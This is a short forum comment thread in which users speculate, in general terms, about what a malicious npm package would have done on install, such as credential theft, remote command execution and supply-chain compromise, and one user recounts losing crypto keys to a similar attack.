I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
You can actually test it yourself. The actual URL is in the post and the website is still up.
Seems like it actually loads a PNG image now, maybe the npm script adds some additional headers to trigger the payload.
AFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want
Arbitrary remote code execution, maybe sold to the highest bidder like some shady cloud provider?
Compromise of developer's access, API keys, etc. in order to create a supply chain attack.
This has happened to me, it was an attack that was trying to get crypto private keys (ethereum)